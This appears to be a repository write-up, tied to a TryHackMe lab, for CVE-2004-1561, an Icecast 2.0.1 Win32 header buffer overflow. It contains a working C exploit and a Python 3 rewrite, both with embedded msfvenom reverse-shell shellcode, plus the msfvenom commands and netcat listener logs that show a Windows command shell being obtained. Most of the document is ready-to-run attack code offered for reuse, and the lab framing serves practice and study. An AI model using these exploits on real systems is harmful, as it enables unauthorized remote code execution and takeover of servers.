# CVE-2004-1561 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32) Python 3 Icecast Header Overwrite buffer overflow RCE < 2.0.1 (Win32), rewritten from this Metasploit module(https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/icecast_header.rb). I rewrote this from the Metasploit module because I couldn't get this(https://www.exploit-db.com/exploits/568) to work. ## Usage: Replace reverse shell shellcode in exploit, call it with argument for remote server and port. ``` email protected:~/TryHackme/Ice# ./icecast.py 8000 Done! ``` Reverse shell listener: ``` email protected:~/TryHackme/Ice# nc -nlvp 443 listening on any 443 ... connect to from (UNKNOWN) 49211 Microsoft Windows Version 6.1.7601 Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Program Files (x86)\Icecast2 Win32> ``` ## Update for 568-edit.c Managed to get the original exploit(https://www.exploit-db.com/exploits/568) to work. Edited according to this(https://www.exploit-db.com/exploits/573). ### Usage for 568-edit.c ``` email protected:~/TryHackme/Ice# gcc 568-edit.c -o 568 email protected:~/TryHackme/Ice# ./568 Icecast <= 2.0.1 Win32 remote code execution 0.1 by Luigi Auriemma e-mail: email protected web:http://aluigi.altervista.org shellcode add-on by Delikon www.delikon.de - target - send malformed data Server IS vulnerable!!! ``` On listener ``` email protected:~# nc -nlvp 443 listening on any 443 ... connect to from (UNKNOWN) 49238 Microsoft Windows Version 6.1.7601 Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Program Files (x86)\Icecast2 Win32> ```
/* Original exploit here: https://www.exploit-db.com/exploits/568 I couldn't get this to work so I edited it according to https://www.exploit-db.com/exploits/573 and made sure the shellcode was executed. Compile and run email protected:~/TryHackme/Ice# gcc 568-edit.c -o 568 email protected:~/TryHackme/Ice# ./568 Icecast <= 2.0.1 Win32 remote code execution 0.1 by Luigi Auriemma e-mail: email protected web:http://aluigi.altervista.org shellcode add-on by Delikon www.delikon.de - target - send malformed data Server IS vulnerable!!! On listener email protected:~# nc -nlvp 443 listening on any 443 ... connect to from (UNKNOWN) 49238 Microsoft Windows Version 6.1.7601 Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Program Files (x86)\Icecast2 Win32> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef WIN32 #pragma comment(lib, "ws2_32.lib") #include <winsock.h> #include "winerr.h" #define close closesocket #else #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <arpa/inet.h> #include <netdb.h> #include <netinet/in.h> #endif #define VER "0.1" #define PORT 8000 #define BUFFSZ 2048 #define TIMEOUT 3 #define EXEC "GET / HTTP/1.0\r\n" \ "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \ "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \ "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \ "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \ "\xcc" // msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST= LPORT=443 -b '\x0a\x0d\x00' -f c unsigned char shellcode = "\xda\xc6\xd9\x74\x24\xf4\x5f\xb8\x1e\xf9\xbc\x15\x2b\xc9\xb1" "\x52\x83\xef\xfc\x31\x47\x13\x03\x59\xea\x5e\xe0\x99\xe4\x1d" "\x0b\x61\xf5\x41\x85\x84\xc4\x41\xf1\xcd\x77\x72\x71\x83\x7b" "\xf9\xd7\x37\x0f\x8f\xff\x38\xb8\x3a\x26\x77\x39\x16\x1a\x16" "\xb9\x65\x4f\xf8\x80\xa5\x82\xf9\xc5\xd8\x6f\xab\x9e\x97\xc2" "\x5b\xaa\xe2\xde\xd0\xe0\xe3\x66\x05\xb0\x02\x46\x98\xca\x5c" "\x48\x1b\x1e\xd5\xc1\x03\x43\xd0\x98\xb8\xb7\xae\x1a\x68\x86" "\x4f\xb0\x55\x26\xa2\xc8\x92\x81\x5d\xbf\xea\xf1\xe0\xb8\x29" "\x8b\x3e\x4c\xa9\x2b\xb4\xf6\x15\xcd\x19\x60\xde\xc1\xd6\xe6" "\xb8\xc5\xe9\x2b\xb3\xf2\x62\xca\x13\x73\x30\xe9\xb7\xdf\xe2" "\x90\xee\x85\x45\xac\xf0\x65\x39\x08\x7b\x8b\x2e\x21\x26\xc4" "\x83\x08\xd8\x14\x8c\x1b\xab\x26\x13\xb0\x23\x0b\xdc\x1e\xb4" "\x6c\xf7\xe7\x2a\x93\xf8\x17\x63\x50\xac\x47\x1b\x71\xcd\x03" "\xdb\x7e\x18\x83\x8b\xd0\xf3\x64\x7b\x91\xa3\x0c\x91\x1e\x9b" "\x2d\x9a\xf4\xb4\xc4\x61\x9f\x7a\xb0\x35\xdf\x13\xc3\xc5\xde" "\x58\x4a\x23\x8a\x8e\x1b\xfc\x23\x36\x06\x76\xd5\xb7\x9c\xf3" "\xd5\x3c\x13\x04\x9b\xb4\x5e\x16\x4c\x35\x15\x44\xdb\x4a\x83" "\xe0\x87\xd9\x48\xf0\xce\xc1\xc6\xa7\x87\x34\x1f\x2d\x3a\x6e" "\x89\x53\xc7\xf6\xf2\xd7\x1c\xcb\xfd\xd6\xd1\x77\xda\xc8\x2f" "\x77\x66\xbc\xff\x2e\x30\x6a\x46\x99\xf2\xc4\x10\x76\x5d\x80" "\xe5\xb4\x5e\xd6\xe9\x90\x28\x36\x5b\x4d\x6d\x49\x54\x19\x79" "\x32\x88\xb9\x86\xe9\x08\xc9\xcc\xb3\x39\x42\x89\x26\x78\x0f" "\x2a\x9d\xbf\x36\xa9\x17\x40\xcd\xb1\x52\x45\x89\x75\x8f\x37" "\x82\x13\xaf\xe4\xa3\x31"; /* in my example 0xcc is used to interrupt the code execution, you must put your shellcode exactly there. You don't need to call a shellcode offset (CALL ESP, JMP ESP and so on) or doing any other annoying operation because the code flow points directly there!!! Cool and easy 8-) */ /*int startWinsock(void) { WSADATA wsa; return WSAStartup(MAKEWORD(2,0),&wsa); } */ int timeout(int sock); u_long resolv(char *host); void std_err(void); int main(int argc, char *argv) { struct sockaddr_in peer; int sd; u_short port = PORT; u_char buffBUFFSZ; u_char buf4096; u_char *pointer=NULL; setbuf(stdout, NULL); fputs("\n" "Icecast <= 2.0.1 Win32 remote code execution "VER"\n" "by Luigi Auriemma\n" "e-mail: email protected\n" "web:http://aluigi.altervista.org\n" "\nshellcode add-on by Delikon\n" "www.delikon.de" "\n", stdout); if(argc < 2) { printf("\nUsage: %s <server> port(%d)\n" "\n" "Note: This exploit will force the Icecast server to download NCAT\n" "and after execution it will spwan a shell on 9999\n" "\n", argv0, PORT); exit(1); } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc > 2) port = atoi(argv2); peer.sin_addr.s_addr = resolv(argv1); peer.sin_port= htons(port); peer.sin_family= AF_INET; memset(buf,0x00,sizeof(buf)); strcpy(buf,EXEC); pointer =strrchr(buf,0xcc); strcpy(pointer,shellcode); strcat(buf,"\r\n"); strcat(buf,"\r\n"); printf("\n- target %s:%hu\n", inet_ntoa(peer.sin_addr), port); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); fputs("- send malformed data\n", stdout); if(send(sd, buf, strlen(buf), 0) < 0) std_err(); if((timeout(sd) < 0) || (recv(sd, buff, BUFFSZ, 0) < 0)) { fputs("\nServer IS vulnerable!!!\n\n", stdout); } else { fputs("\nServer doesn't seem vulnerable\n\n", stdout); } close(sd); return(0); } int timeout(int sock) { struct timeval tout; fd_set fd_read; int err; tout.tv_sec = TIMEOUT; tout.tv_usec = 0; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); err = select(sock + 1, &fd_read, NULL, NULL, &tout); if(err < 0) std_err(); if(!err) return(-1); return(0); } u_long resolv(char *host) { struct hostent *hp; u_long host_ip; host_ip = inet_addr(host); if(host_ip == INADDR_NONE) { hp = gethostbyname(host); if(!hp) { printf("\nError: Unable to resolve hostname (%s)\n", host); exit(1); } else host_ip = *(u_long *)(hp->h_addr); } return(host_ip); } #ifndef WIN32 void std_err(void) { exit(1); } #endif // milw0rm.com 2004-10-06
#!/usr/bin/env python3 ############################################################################################## # How to use: # 1. Replace 'buf' shellcode below with msfvenom shellcode # 2. Call it like this: ./icecast.py <target> <port> # Eg. email protected:~# ./icecast.py 8000 ############################################################################################## import socket import sys host = sys.argv1 # Receive IP from user port = int(sys.argv2) # Receive Port from user # Replace with own shellcode here # msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST= LPORT=443 -f python -b '\x00\x0a\x0d' buf = "" buf += "\xd9\xc5\xd9\x74\x24\xf4\xba\xc4\x81\xbb\x95\x5e\x31" buf += "\xc9\xb1\x52\x31\x56\x17\x03\x56\x17\x83\x2a\x7d\x59" buf += "\x60\x4e\x96\x1c\x8b\xae\x67\x41\x05\x4b\x56\x41\x71" buf += "\x18\xc9\x71\xf1\x4c\xe6\xfa\x57\x64\x7d\x8e\x7f\x8b" buf += "\x36\x25\xa6\xa2\xc7\x16\x9a\xa5\x4b\x65\xcf\x05\x75" buf += "\xa6\x02\x44\xb2\xdb\xef\x14\x6b\x97\x42\x88\x18\xed" buf += "\x5e\x23\x52\xe3\xe6\xd0\x23\x02\xc6\x47\x3f\x5d\xc8" buf += "\x66\xec\xd5\x41\x70\xf1\xd0\x18\x0b\xc1\xaf\x9a\xdd" buf += "\x1b\x4f\x30\x20\x94\xa2\x48\x65\x13\x5d\x3f\x9f\x67" buf += "\xe0\x38\x64\x15\x3e\xcc\x7e\xbd\xb5\x76\x5a\x3f\x19" buf += "\xe0\x29\x33\xd6\x66\x75\x50\xe9\xab\x0e\x6c\x62\x4a" buf += "\xc0\xe4\x30\x69\xc4\xad\xe3\x10\x5d\x08\x45\x2c\xbd" buf += "\xf3\x3a\x88\xb6\x1e\x2e\xa1\x95\x76\x83\x88\x25\x87" buf += "\x8b\x9b\x56\xb5\x14\x30\xf0\xf5\xdd\x9e\x07\xf9\xf7" buf += "\x67\x97\x04\xf8\x97\xbe\xc2\xac\xc7\xa8\xe3\xcc\x83" buf += "\x28\x0b\x19\x03\x78\xa3\xf2\xe4\x28\x03\xa3\x8c\x22" buf += "\x8c\x9c\xad\x4d\x46\xb5\x44\xb4\x01\x7a\x30\xea\x51" buf += "\x12\x43\x12\x53\x58\xca\xf4\x39\x8e\x9b\xaf\xd5\x37" buf += "\x86\x3b\x47\xb7\x1c\x46\x47\x33\x93\xb7\x06\xb4\xde" buf += "\xab\xff\x34\x95\x91\x56\x4a\x03\xbd\x35\xd9\xc8\x3d" buf += "\x33\xc2\x46\x6a\x14\x34\x9f\xfe\x88\x6f\x09\x1c\x51" buf += "\xe9\x72\xa4\x8e\xca\x7d\x25\x42\x76\x5a\x35\x9a\x77" buf += "\xe6\x61\x72\x2e\xb0\xdf\x34\x98\x72\x89\xee\x77\xdd" buf += "\x5d\x76\xb4\xde\x1b\x77\x91\xa8\xc3\xc6\x4c\xed\xfc" buf += "\xe7\x18\xf9\x85\x15\xb9\x06\x5c\x9e\xc9\x4c\xfc\xb7" buf += "\x41\x09\x95\x85\x0f\xaa\x40\xc9\x29\x29\x60\xb2\xcd" buf += "\x31\x01\xb7\x8a\xf5\xfa\xc5\x83\x93\xfc\x7a\xa3\xb1" evul = "\xeb\x0c" + " / HTTP/1.1 " + buf + "\r\n" + "Accept: text/html\r\n"*31 evul += "\xff\x64\x24\x04" + "\r\n\r\n" # jmp esp+4 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket client.connect((host,port)) #Connect to TCP socket client.sendall(evul.encode('latin-1')) # Send buffer overflow client.close() print("\nDone!")